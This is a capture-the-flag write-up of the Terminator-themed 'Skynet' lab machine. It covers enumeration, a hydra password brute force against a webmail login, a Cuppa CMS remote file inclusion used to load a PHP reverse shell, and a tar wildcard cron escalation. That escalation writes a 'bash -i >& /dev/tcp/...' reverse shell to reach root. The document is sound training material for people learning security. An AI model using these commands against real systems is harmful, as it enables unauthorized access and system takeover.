Skynet writeup [thm]
![Skynet pic](../../images/skynet.jpg)
A vulnerable Terminator themed Linux machine.
Skynet... So much for getting cocky after solving Simple CTF so easily. Skynet gave me a lot more trouble.
What is Miles password for his emails?
This took me some time to figure out.
$: nmap -A -p- $target Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-13 22:11 CEST Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 7.57% done; ETC: 22:13 (0:01:50 remaining) Nmap scan report for $target Host is up (0.047s latency). Not shown: 65529 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA) | 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA) |_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Skynet 110/tcp open pop3 Dovecot pop3d |_pop3-capabilities: RESP-CODES TOP AUTH-RESP-CODE PIPELINING SASL CAPA UIDL 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 143/tcp open imap Dovecot imapd |_imap-capabilities: ID more LOGINDISABLEDA0001 post-login LITERAL+ listed have LOGIN-REFERRALS Pre-login OK capabilities SASL-IR ENABLE IMAP4rev1 IDLE 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 1h39m48s, deviation: 2h53m12s, median: -11s |_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: skynet | NetBIOS computer name: SKYNET\x00 | Domain name: \x00 | FQDN: skynet |_ System time: 2021-05-13T15:12:22-05:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-05-13T20:12:22 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 77.67 seconds
There's a lot of stuff going on here.
We start by visiting the web server in a browser. It's just a non-functional search engine containing no useful information. Are there any other pages?
Gobuster:
$: gobuster dir -u $target -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://$target [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2021/05/13 22:55:07 Starting gobuster in directory enumeration mode =============================================================== /admin (Status: 301) [Size: 312] [--> http://$target/admin/] /css (Status: 301) [Size: 310] [--> http://$target/css/] /js (Status: 301) [Size: 309] [--> http://$target/js/] /config (Status: 301) [Size: 313] [--> http://$target/config/] /ai (Status: 301) [Size: 309] [--> http://$target/ai/] /squirrelmail (Status: 301) [Size: 319] [--> http://$target/squirrelmail/] /server-status (Status: 403) [Size: 277] Progress: 141981 / 220561 (64.37%) =============================================================== 2021/05/13 23:14:21 Finished
Let's keep this information in mind.
We also want to enumerate Samba:
$: enum4linux -A $target > enum_samba
========================================= | Share Enumeration on $target | ========================================= Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers anonymous Disk Skynet Anonymous Share milesdyson Disk Miles Dyson Personal Share IPC$ IPC IPC Service (skynet server (Samba, Ubuntu)) ===================================== | Session Check on $target | ===================================== [+] Server $target allows sessions using username '', password ''
We got a username!
Checking out the anonymous share is a good place to start:
$: smbclient //$target/anonymous
Here we find a file:
$: cat attention.txt A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this. -Miles Dyson
Hmmm, can we use this intel to our advantage somehow?
There's also a directory with logs:
smb: \logs\> ls . D 0 Wed Sep 18 06:42:16 2019 .. D 0 Thu Nov 26 17:04:00 2020 log2.txt N 0 Wed Sep 18 06:42:13 2019 log1.txt N 471 Wed Sep 18 06:41:59 2019 log3.txt N 0 Wed Sep 18 06:42:16 2019 9204224 blocks of size 1024. 5831504 blocks available smb: \logs\>
Let's get log1.txt and have a look at it:
cyborg007haloterminator terminator22596 terminator219 terminator20 terminator1989 terminator1988 terminator168 terminator16 terminator143 terminator13 terminator123!@# terminator1056 terminator101 terminator10 terminator02 terminator00 roboterminator pongterminator manasturcaluterminator exterminator95 exterminator200 dterminator djxterminator dexterminator determinator cyborg007haloterminator avsterminator alonsoterminator Walterminator 79terminator6 1996terminator
It looks like this could be a list of potential passwords.
It's worth a shot to run this list against milesdyson's private Samba share but no luck there. However, gobuster revealed http://$target/squirrelmail/ maybe one or more entries in this list are passwords for his email account?
Manually trying 31 passwords sounds tedious so we let hydra do the heavy lifting for us.
By looking at the source code for the squirrelmail page and taking note of the names of the username and password input boxes we can craft a command to let hydra automagically try all of the passwords for us:
$: hydra -t 1 -l milesdyson -P log1.txt $target http-post-form "/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^:F=incorrect" -vV Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these fucks ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-13 23:13:37 [DATA] max 1 task per 1 server, overall 1 task, 31 login tries (l:1/p:31), ~31 tries per task [DATA] attacking http-post-form://$target:80/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^:F=incorrect [VERBOSE] Resolving addresses ... [VERBOSE] resolving done [ATTEMPT] target $target - login "milesdyson" - pass "cyborg007haloterminator" - 1 of 31 [child 0] (0/0) [80][http-post-form] host: $target login: milesdyson password: cyborg007haloterminator [STATUS] attack finished for $target (waiting for children to complete tests) 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-05-13 23:13:38
In other words, It worked!
Using these credentials we can now login to his email account.
What is the hidden directory?
Looking through his emails we find:
Subject: Samba Password reset From: skynet@skynet Date: Tue, September 17, 2019 10:10 pm Priority: Normal Options: View Full Header View Printable Version Download this as a file We have changed your smb password after system malfunction. Password: [REDACTED]
And another strange email:
01100010 01100001 01101100 01101100 01110011 00100000 01101000 01100001 01110110 01100101 00100000 01111010 01100101 01110010 01101111 00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
Which converts to:
balls have zero to me to me to me to me to me to me to me to me to
And yet another weird one:
i can i i everything else . . . . . . . . . . . . . . balls have zero to me to me to me to me to me to me to me to me to you i everything else . . . . . . . . . . . . . . balls have a ball to me to me to me to me to me to me to me i i can i i i everything else . . . . . . . . . . . . . . balls have a ball to me to me to me to me to me to me to me i . . . . . . . . . . . . . . . . . . . balls have zero to me to me to me to me to me to me to me to me to you i i i i i everything else . . . . . . . . . . . . . . balls have 0 to me to me to me to me to me to me to me to me to you i i i everything else . . . . . . . . . . . . . . balls have zero to me to me to me to me to me to me to me to me to
Both of the bizarre emails are from serenakogan@skynet. Is this a clue or just nonsense? Might come in handy later on, or not.
In any case, we got the Samba password, nice!
We will now login to milesdyson's personal Samba share. Since the password contains some funky characters we stuff it away in a variable.
$: pw=')s{A&2Z=F^n_E.B`' $: smbclient -U milesdyson \\\\$target\\milesdyson $pw Try "help" to get a list of possible commands. smb: \> smb: \> ls . D 0 Tue Sep 17 11:05:47 2019 .. D 0 Wed Sep 18 05:51:03 2019 Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 11:05:14 2019 Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 11:05:14 2019 Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 11:05:14 2019 notes D 0 Tue Sep 17 11:18:40 2019 Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 11:05:14 2019 Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 11:05:14 2019 smb: \> cd notes\ smb: \notes\> ls . D 0 Tue Sep 17 11:18:40 2019 .. D 0 Tue Sep 17 11:05:47 2019 3.01 Search.md N 65601 Tue Sep 17 11:01:29 2019 4.01 Agent-Based Models.md N 5683 Tue Sep 17 11:01:29 2019 2.08 In Practice.md N 7949 Tue Sep 17 11:01:29 2019 0.00 Cover.md N 3114 Tue Sep 17 11:01:29 2019 1.02 Linear Algebra.md N 70314 Tue Sep 17 11:01:29 2019 important.txt N 117 Tue Sep 17 11:18:39 2019 6.01 pandas.md N 9221 Tue Sep 17 11:01:29 2019 3.00 Artificial Intelligence.md N 33 Tue Sep 17 11:01:29 2019 2.01 Overview.md N 1165 Tue Sep 17 11:01:29 2019 3.02 Planning.md N 71657 Tue Sep 17 11:01:29 2019 1.04 Probability.md N 62712 Tue Sep 17 11:01:29 2019 2.06 Natural Language Processing.md N 82633 Tue Sep 17 11:01:29 2019 2.00 Machine Learning.md N 26 Tue Sep 17 11:01:29 2019 1.03 Calculus.md N 40779 Tue Sep 17 11:01:29 2019 3.03 Reinforcement Learning.md N 25119 Tue Sep 17 11:01:29 2019 1.06 Bayesian Statistics.md N 39554 Tue Sep 17 11:01:29 2019 6.00 Appendices.md N 20 Tue Sep 17 11:01:29 2019 1.01 Functions.md N 7627 Tue Sep 17 11:01:29 2019 2.03 Neural Nets.md N 144726 Tue Sep 17 11:01:29 2019 2.04 Model Selection.md N 33383 Tue Sep 17 11:01:29 2019 2.02 Supervised Learning.md N 94287 Tue Sep 17 11:01:29 2019 4.00 Simulation.md N 20 Tue Sep 17 11:01:29 2019 3.05 In Practice.md N 1123 Tue Sep 17 11:01:29 2019 1.07 Graphs.md N 5110 Tue Sep 17 11:01:29 2019 2.07 Unsupervised Learning.md N 21579 Tue Sep 17 11:01:29 2019 2.05 Bayesian Learning.md N 39443 Tue Sep 17 11:01:29 2019 5.03 Anonymization.md N 2516 Tue Sep 17 11:01:29 2019 5.01 Process.md N 5788 Tue Sep 17 11:01:29 2019 1.09 Optimization.md N 25823 Tue Sep 17 11:01:29 2019 1.05 Statistics.md N 64291 Tue Sep 17 11:01:29 2019 5.02 Visualization.md N 940 Tue Sep 17 11:01:29 2019 5.00 In Practice.md N 21 Tue Sep 17 11:01:29 2019 4.02 Nonlinear Dynamics.md N 44601 Tue Sep 17 11:01:29 2019 1.10 Algorithms.md N 28790 Tue Sep 17 11:01:29 2019 3.04 Filtering.md N 13360 Tue Sep 17 11:01:29 2019 1.00 Foundations.md N 22 Tue Sep 17 11:01:29 2019 9204224 blocks of size 1024. 5810256 blocks available
We download and inspect important.txt:
1. Add features to beta CMS /[REDACTED] 2. Work on T-800 Model 101 blueprints 3. Spend more time with my wife
If we visit http://$target/[REDACTED/ we see that this is Miles Dyson personal page.
Dr. Miles Bennett Dyson was the original inventor of the neural-net processor which would lead to the development of Skynet, a computer A.I. intended to control electronically linked weapons and defend the United States.
Hidden directory uncovered!
What is the vulnerability called when you can include a remote file for malicious purposes?
Remote file inclusion (RFI).
A file inclusion vulnerability is a type of web vulnerability that is most commonly found to affect web applications that rely on a scripting run time. This issue is caused when an application builds a path to executable code using an attacker-controlled variable in a way that allows the attacker to control which file is executed at run time. A file include vulnerability is distinct from a generic directory traversal attack, in that directory traversal is a way of gaining unauthorized file system access, and a file inclusion vulnerability subverts how an application loads code for execution. Successful exploitation of a file inclusion vulnerability will result in remote code execution on the web server that runs the affected web application. An attacker can use remote code execution to create a web shell on the web server, which can be used for website defacement.
What is the user flag?
Doing a gobuster search on the hidden directory /[REDACTED] we find an administrator page running Cuppa CMS. The previous question gives us a hint that we should be on the lookout for RFI's.
By searching for Cuppa CMS RFI vulnerabilities in exploit-db we find Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion by the CWH Underground Hacking Team.
DESCRIPTION ##################################################### An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise. http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]
This exploit is pretty damn cool!
e.g.
$: curl -s http://$target/[REDACTED]/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd <script> function CloseDefaultAlert(){ SetAlert(false, "", "#alert"); setTimeout(function () {SetBlockade(false)}, 200); } function ShowAlert(){ _width = ''; _height = ''; jQuery('#alert').animate({width:parseInt(_width), height:parseInt(_height), 'margin-left':-(parseInt(_width)*0.5)+20, 'margin-top':-(parseInt(_height)*0.5)+20 }, 300, "easeInOutCirc", CompleteAnimation); function CompleteAnimation(){ jQuery("#btnClose_alert").css('visibility', "visible"); jQuery("#description_alert").css('visibility', "visible"); jQuery("#content_alert").css('visibility', "visible"); } } </script> <div class="alert_config_field" id="alert" style="z-index:;"> <div class="btnClose_alert" id="btnClose_alert" onclick="javascript:CloseDefaultAlert();"></div> <div class="description_alert" id="description_alert"><b>Field configuration: </b></div> <div class="separator" style="margin-bottom:15px;"></div> <div id="content_alert" class="content_alert"> root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false lxd:x:106:65534::/var/lib/lxd/:/bin/false messagebus:x:107:111::/var/run/dbus:/bin/false uuidd:x:108:112::/run/uuidd:/bin/false dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin milesdyson:x:1001:1001:,,,:/home/milesdyson:/bin/bash dovecot:x:111:119:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false dovenull:x:112:120:Dovecot login user,,,:/nonexistent:/bin/false postfix:x:113:121::/var/spool/postfix:/bin/false mysql:x:114:123:MySQL Server,,,:/nonexistent:/bin/false </div> </div>
Not bad, huh?
We can use this to get a PHP reverse shell going.
Set a suitable port and change the IP address in the script and serve it up. I used my private server but in hindsight I've should have gone with the famous Python one-liner:
$: python3 -m http.server 8000
Start listening:
$: listening on [any] 1234 ...
Now, go to the following URL in a web browser
http://$target/[REDACTED]/administrator/alerts/alertConfigField.php?urlConfig=http://$pathTo/php-reverse-shell.php
We have a shell! It's unprivileged but it's a good start.
$: cd /home/milesdyson $: ls backups mail share user.txt $: cat user.txt [REDACTED]
What is the root flag?
As always, the best part! How can we go from a simpleton user like www-data to root?
In the home directory of milesdyson we find a backup script that grabs the contents of /var/www/html. Looking in the crontab entries we see that this script is run as root!
The backup script uses tar and GTFOBins tells us how to escalate our privileges and get a root shell.
$: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
The following is a sneaky way of getting a root shell. We will trick the machine into giving us a privileged reverse shell.
$: printf '#!/bin/bash\nbash -i >& /dev/tcp/$yourip/1235 0>&1' > /var/www/html/shell $: chmod +x /var/www/html/shell $: touch /var/www/html/--checkpoint=1 $: touch /var/www/html/--checkpoint-action=exec=bash\ shell
This will fool tar into executing the file shell with the needed options and open a TCP connection to our own machine where we have netcat eagerly awaiting any incoming connection.
$: nc -lvp 1235 listening on [any] 1235 ... $target: inverse host lookup failed: Unknown host connect to [$yourip] from (UNKNOWN) [$target] 49660 bash: cannot set terminal process group (4662): Inappropriate ioctl for device bash: no job control in this shell root@skynet:/var/www/html#
Now:
root@skynet:/var/www/html# cd /root root@skynet:~# cat root.txt [REDACTED]
Hasta la vista, baby.
Conclusion
This was frustrating and challenging but lots of fun. I got stuck a couple of times and felt really stupid because I "should" be able to solve this quickly. I then took a step back and I eventually got it.
I'm not very comfortable with Samba since I don't use it very much but it's good to be exposed to it and being forced to learn new things.
Sadly, I didn't not manage to figure out the privesc on my own. I got to the point where I had the necessary tar command but I needed a hint on how to tie it altogether with the reverse shell and creating the files corresponding to the tar switches but now I know how to do this in the future.
I assumed that this challenge would be really easy but that was not the case for me. Quite a wild ride and I learned some cool things along the way.
Tools used:
- Nmap
- Enum4linux
- Smbclient
- Gobuster
- Hydra
- Exploitdb
- Netcat
- php-reverse-shell.php
- GTFOBins
- Tar
- Crontab